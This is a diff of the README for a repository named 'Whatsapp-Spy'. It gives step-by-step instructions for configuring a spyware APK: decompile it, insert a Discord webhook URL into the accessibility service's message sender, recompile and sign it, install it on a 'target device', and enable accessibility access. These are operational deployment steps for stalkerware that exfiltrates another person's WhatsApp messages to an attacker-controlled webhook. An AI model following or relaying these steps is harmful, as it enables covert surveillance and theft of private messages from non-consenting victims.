jimmyntron777/Whatsapp-Spy/README.md

     * Download APK file.
     * To decompile the APK, open it in an APK Editor like [APKToolGUI](https://github.com/AndnixSH/APKToolGUI) or [APK Editor Studio](https://github.com/kefir500/apk-editor-studio).
     * Open the decompilation folder and find the file named `MyAccessibilityService$MessageSender.smali`.
-    * Search for `DISCORD_WEBHOOK_URL` and replace it with your correspondent BOT URL you got it from Discord.
+    * Search for `YOUR_DISCORD_WEBHOOK_URL` and replace it with your correspondent BOT URL you got it from Discord.
     * Compile and sign apk.
     * Install on target device.
     * You __must__ enable it in the accessibility settings.